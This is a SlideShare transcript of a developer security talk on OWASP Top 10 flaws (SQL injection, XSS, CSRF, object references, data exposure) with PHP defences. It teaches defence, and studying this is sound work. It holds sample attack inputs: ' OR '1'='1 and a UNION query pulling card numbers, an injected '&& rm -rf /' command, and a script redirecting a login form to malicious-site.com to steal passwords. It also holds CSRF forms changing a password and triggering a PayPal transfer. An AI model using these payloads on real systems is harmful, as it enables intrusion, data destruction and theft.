SlideShare une entreprise Scribd logo

Hacking Your Way To Better Security

Colin O'Dell
Colin O'Dell

The goal of this talk is to educate developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, session hijacking, and insecure direct object references. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. Once we've established an understanding of how these attacks work, we'll look at concrete steps you can take to secure web applications against such vulnerabilities. The knowledge gained from this talk can also be used for participating in "Capture the Flag" security competitions.

Internet
1  sur  109
Télécharger pour lire hors ligne
Hacking Your Way To Better Security
Colin O’Dell @colinodell Lead Web Developer at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Upgrade Guide e-book author php[world] 2015 CtF winner
Goals Explore several top security vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities
Disclaimers 1.NEVER test systems that aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
OWASP Top 10
OWASP Top 10 Regular publication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks
SQL Injection Modifying SQL statements to: Spoof identity Tamper with data Disclose hidden information
SQL Injection Basics $value = $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
Username Password Log In admin password
Username Password Log In admin Invalid username or password. Please try again. password'
Username Password Log In admin Unknown error.
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ ~~ $
Username Password Log In admin Unknown error. ' test
Username Password Log In admin Unknown error.
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
~~~~~~~~ SELECT * FROM users WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test
SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ~~~~~~~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
SELECT * FROM users WHERE username = 'admin' AND password = '' '; ' SELECT * FROM users WHERE username = 'admin' AND password = '' '; ~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ' ' SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ~~~~~~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; ' OR ' SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' ';
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1 SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';
Username Password Log In admin Unknown error. ' OR '1'='1
Welcome Admin! Admin Menu: Give customer money Take money away Review credit card applications Close accounts
Blind SQL Injection
Blind SQL Injection Invalid username or password. Please try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result)
Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = '
Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = ' Unknown error. ErrorsQuery SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
Username Password Log In admin ' AND (SELECT id FROM users LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
Username Password Log In admin Invalid username or password. Please try again.
SQL Injection: Data Disclosure
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION
SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION
SQL UNION Query Column 1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 }
$val = $_REQUEST['value']; $sql = "SELECT * FROM x WHERE y = '$val' "; $database->query($sql); Protecting Against SQL Injection Block input with special characters
Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
Protecting Against SQL Injection Block input with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
Other Types of Injection NoSQL databases OS Commands LDAP Queries SMTP Headers $file = $_GET['filename']; shell_exec("rm uploads/{$file}"); /rm.php?filename=foo.jpg+%26%26+rm+-rf+%2F rm uploads/foo.jpg && rm -rf /
XSS Cross-Site Scripting Injecting code into the webpage (for other users) • Execute malicious scripts • Hijack sessions • Install malware • Deface websites
XSS Attack Basics $value = $_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT x FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
XSS – Cross-Site Scripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
XSS – Cross-Site Scripting short.ly Paste a URL here Shorten
XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten
XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL:http://www.colinodell.com
XSS – Cross-Site Scripting short.ly Please wait while we redirect you to http://www.colinodell.com
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL:
<p> Short URL: <a href="…">http://short.ly/3bs8a</a> </p> <p> Original URL: <a href="…"><script>alert('hello world!');</script></a> </p>
XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL:
XSS – Cross-Site Scripting short.ly Please wait while we redirect you to
XSS – Cross-Site Scripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php';
Protecting Against XSS Attacks $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
Protecting Against XSS Attacks • Filter user input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
Protecting Against XSS Attacks • Filter user input • Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> &lt;script&gt; htmlspecialchars()
Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output {{ some_variable }} {{ some_variable|raw }}
CSRF Cross-Site Request Forgery Execute unwanted actions on another site which user is logged in to. • Change password • Transfer funds • Anything the user can do
CSRF – Cross-Site Request Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
CSRF – Cross-Site Request Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done!
CSRF – Cross-Site Request Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten
CSRF – Cross-Site Request Forgery short.ly Please wait while we redirect you to X
Protecting Against CSRF Attacks Use randomized CSRF tokens <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
Insecure Direct Object References Access & manipulate objects you shouldn’t have access to
Insecure Direct Object References
Insecure Direct Object References Beverly Coop
Insecure Direct Object References
Insecure Direct Object References
Insecure Direct Object References
Insecure Direct Object References
Protecting Against Insecure Direct Object References Check permission on data input • URL / route parameters • Form field inputs • Basically anything that’s an ID • If they don’t have permission, show a 403 (or 404) page
Protecting Against Insecure Direct Object References Check permission on data input Check permission on data output • Do they have permission to access this object? • Do they have permission to even know this exists? • This is not “security through obscurity”
Sensitive Data Exposure Security Misconfiguration Components with Known Vulnerabilities
http://www.example.com/CHANGELOG http://www.example.com/composer.lock http://www.example.com/.git/ http://www.example.com/.env http://www.example.com/robots.txt Sensitive Data Exposure
Sensitive Data Exposure - CHANGELOG
Sensitive Data Exposure – composer.lock
Sensitive Data Exposure – composer.lock
Sensitive Data Exposure – .git
Sensitive Data Exposure – robots.txt
Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption) • Customer information • Credit card numbers • Credentials Sensitive Data Exposure
Security Misconfiguration & Components with Known Vulnerabilities Default accounts enabled; weak passwords • admin / admin Security configuration • Does SSH grant root access? • Are weak encryption keys used? Out-of-date software • Old versions with known issues • Are the versions exposed? • Unused software running (DROWN attack)
Components with Known Vulnerabilities
Components with Known Vulnerabilities
Components with Known Vulnerabilities
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date • Install critical updates immediately • Install other updates regularly
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root • Files which provide version numbers • README, CHANGELOG, .git, composer.lock • Database credentials & API keys • Encryption keys
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption • Encrypt with a strong private key • Encrypt backups and data-in-transit • Use strong hashing techniques for passwords
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems • Scan your systems with automated tools • Test critical components yourself • Automated tests • Manual tests
Next Steps Test your own applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed
Questions?
Thanks! Slides & feedback: https://joind.in/17622 Colin O'Dell @colinodell

Recommandé

Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
 
Hacking Your Way to Better Security - ZendCon 2016
Hacking Your Way to Better Security - ZendCon 2016Hacking Your Way to Better Security - ZendCon 2016
Hacking Your Way to Better Security - ZendCon 2016Colin O'Dell
 
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Hacking Your Way To Better Security - DrupalCon Baltimore 2017Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Hacking Your Way To Better Security - DrupalCon Baltimore 2017Colin O'Dell
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Colin O'Dell
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Apache Solr Search Mastery
Apache Solr Search MasteryApache Solr Search Mastery
Apache Solr Search MasteryAcquia
 

Recommandé

Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
 
Hacking Your Way to Better Security - ZendCon 2016
Hacking Your Way to Better Security - ZendCon 2016Hacking Your Way to Better Security - ZendCon 2016
Hacking Your Way to Better Security - ZendCon 2016Colin O'Dell
 
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Hacking Your Way To Better Security - DrupalCon Baltimore 2017Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Hacking Your Way To Better Security - DrupalCon Baltimore 2017Colin O'Dell
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Colin O'Dell
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Apache Solr Search Mastery
Apache Solr Search MasteryApache Solr Search Mastery
Apache Solr Search MasteryAcquia
 
jQuery Presentasion
jQuery PresentasionjQuery Presentasion
jQuery PresentasionMohammad Usman
 
SQLAlchemy Seminar
SQLAlchemy SeminarSQLAlchemy Seminar
SQLAlchemy SeminarYury Yurevich
 
Separation of concerns - DPC12
Separation of concerns - DPC12Separation of concerns - DPC12
Separation of concerns - DPC12Stephan Hochdörfer
 
Clean code
Clean codeClean code
Clean codeLilit Mkrtchyan
 
Symfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologySymfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologyDaniel Knell
 
Dollar symbol
Dollar symbolDollar symbol
Dollar symbolAaron Huang
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introductionStijn Van Minnebruggen
 
Возможности, особенности и проблемы AR::Relation
Возможности, особенности и проблемы AR::RelationВозможности, особенности и проблемы AR::Relation
Возможности, особенности и проблемы AR::RelationАлександр Ежов
 
Scala ActiveRecord
Scala ActiveRecordScala ActiveRecord
Scala ActiveRecordscalaconfjp
 
Daily notes
Daily notesDaily notes
Daily notesmeghendra168
 
Better Bullshit Driven Development [SeleniumCamp 2017]
Better Bullshit Driven Development [SeleniumCamp 2017]Better Bullshit Driven Development [SeleniumCamp 2017]
Better Bullshit Driven Development [SeleniumCamp 2017]automician
 
Open Selector
Open SelectorOpen Selector
Open Selectorjjdelc
 
Dig Deeper into WordPress - WD Meetup Cairo
Dig Deeper into WordPress - WD Meetup CairoDig Deeper into WordPress - WD Meetup Cairo
Dig Deeper into WordPress - WD Meetup CairoMohamed Mosaad
 
Essentials and Impactful Features of ES6
Essentials and Impactful Features of ES6Essentials and Impactful Features of ES6
Essentials and Impactful Features of ES6Riza Fahmi
 
Web2py
Web2pyWeb2py
Web2pyLucas D
 
Security in laravel
Security in laravelSecurity in laravel
Security in laravelSayed Ahmed
 
PhoneGap: Local Storage
PhoneGap: Local StoragePhoneGap: Local Storage
PhoneGap: Local StorageIvano Malavolta
 
Introduction to SQLAlchemy ORM
Introduction to SQLAlchemy ORMIntroduction to SQLAlchemy ORM
Introduction to SQLAlchemy ORMJason Myers
 
Roman iovlev. Test UI with JDI - Selenium camp
Roman iovlev. Test UI with JDI - Selenium campRoman iovlev. Test UI with JDI - Selenium camp
Roman iovlev. Test UI with JDI - Selenium campРоман Иовлев
 
SQL Transactions - What they are good for and how they work
SQL Transactions - What they are good for and how they workSQL Transactions - What they are good for and how they work
SQL Transactions - What they are good for and how they workMarkus Winand
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 

Contenu connexe

Tendances

Symfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologySymfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologyDaniel Knell
 
Возможности, особенности и проблемы AR::Relation
Возможности, особенности и проблемы AR::RelationВозможности, особенности и проблемы AR::Relation
Возможности, особенности и проблемы AR::RelationАлександр Ежов
 
Scala ActiveRecord
Scala ActiveRecordScala ActiveRecord
Scala ActiveRecordscalaconfjp
 
Better Bullshit Driven Development [SeleniumCamp 2017]
Better Bullshit Driven Development [SeleniumCamp 2017]Better Bullshit Driven Development [SeleniumCamp 2017]
Better Bullshit Driven Development [SeleniumCamp 2017]automician
 
Open Selector
Open SelectorOpen Selector
Open Selectorjjdelc
 
Dig Deeper into WordPress - WD Meetup Cairo
Dig Deeper into WordPress - WD Meetup CairoDig Deeper into WordPress - WD Meetup Cairo
Dig Deeper into WordPress - WD Meetup CairoMohamed Mosaad
 
Essentials and Impactful Features of ES6
Essentials and Impactful Features of ES6Essentials and Impactful Features of ES6
Essentials and Impactful Features of ES6Riza Fahmi
 
Security in laravel
Security in laravelSecurity in laravel
Security in laravelSayed Ahmed
 
Introduction to SQLAlchemy ORM
Introduction to SQLAlchemy ORMIntroduction to SQLAlchemy ORM
Introduction to SQLAlchemy ORMJason Myers
 
Roman iovlev. Test UI with JDI - Selenium camp
Roman iovlev. Test UI with JDI - Selenium campRoman iovlev. Test UI with JDI - Selenium camp
Roman iovlev. Test UI with JDI - Selenium campРоман Иовлев
 
SQL Transactions - What they are good for and how they work
SQL Transactions - What they are good for and how they workSQL Transactions - What they are good for and how they work
SQL Transactions - What they are good for and how they workMarkus Winand
 

Tendances (20)

jQuery Presentasion
jQuery PresentasionjQuery Presentasion
jQuery Presentasion
 
SQLAlchemy Seminar
SQLAlchemy SeminarSQLAlchemy Seminar
SQLAlchemy Seminar
 
Separation of concerns - DPC12
Separation of concerns - DPC12Separation of concerns - DPC12
Separation of concerns - DPC12
 
Clean code
Clean codeClean code
Clean code
 
Symfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologySymfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technology
 
Dollar symbol
Dollar symbolDollar symbol
Dollar symbol
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introduction
 
Возможности, особенности и проблемы AR::Relation
Возможности, особенности и проблемы AR::RelationВозможности, особенности и проблемы AR::Relation
Возможности, особенности и проблемы AR::Relation
 
Scala ActiveRecord
Scala ActiveRecordScala ActiveRecord
Scala ActiveRecord
 
Daily notes
Daily notesDaily notes
Daily notes
 
Better Bullshit Driven Development [SeleniumCamp 2017]
Better Bullshit Driven Development [SeleniumCamp 2017]Better Bullshit Driven Development [SeleniumCamp 2017]
Better Bullshit Driven Development [SeleniumCamp 2017]
 
Open Selector
Open SelectorOpen Selector
Open Selector
 
Dig Deeper into WordPress - WD Meetup Cairo
Dig Deeper into WordPress - WD Meetup CairoDig Deeper into WordPress - WD Meetup Cairo
Dig Deeper into WordPress - WD Meetup Cairo
 
Essentials and Impactful Features of ES6
Essentials and Impactful Features of ES6Essentials and Impactful Features of ES6
Essentials and Impactful Features of ES6
 
Web2py
Web2pyWeb2py
Web2py
 
Security in laravel
Security in laravelSecurity in laravel
Security in laravel
 
PhoneGap: Local Storage
PhoneGap: Local StoragePhoneGap: Local Storage
PhoneGap: Local Storage
 
Introduction to SQLAlchemy ORM
Introduction to SQLAlchemy ORMIntroduction to SQLAlchemy ORM
Introduction to SQLAlchemy ORM
 
Roman iovlev. Test UI with JDI - Selenium camp
Roman iovlev. Test UI with JDI - Selenium campRoman iovlev. Test UI with JDI - Selenium camp
Roman iovlev. Test UI with JDI - Selenium camp
 
SQL Transactions - What they are good for and how they work
SQL Transactions - What they are good for and how they workSQL Transactions - What they are good for and how they work
SQL Transactions - What they are good for and how they work
 

Similaire à Hacking Your Way To Better Security

SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Ömer Çıtak
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQLHung-yu Lin
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your databaseMostafa Siraj
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Owasp Indy Q2 2012 Advanced SQLi
Owasp Indy Q2 2012 Advanced SQLiOwasp Indy Q2 2012 Advanced SQLi
Owasp Indy Q2 2012 Advanced SQLiowaspindy
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxDave Stokes
 
How to lose your database and your job
How to lose your database and your jobHow to lose your database and your job
How to lose your database and your jobRyan Gooler
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 

Similaire à Hacking Your Way To Better Security (20)

Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injection
 
2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL
 
2nd-Order-SQLi-Josh
2nd-Order-SQLi-Josh2nd-Order-SQLi-Josh
2nd-Order-SQLi-Josh
 
Sql Injection
Sql InjectionSql Injection
Sql Injection
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Owasp Indy Q2 2012 Advanced SQLi
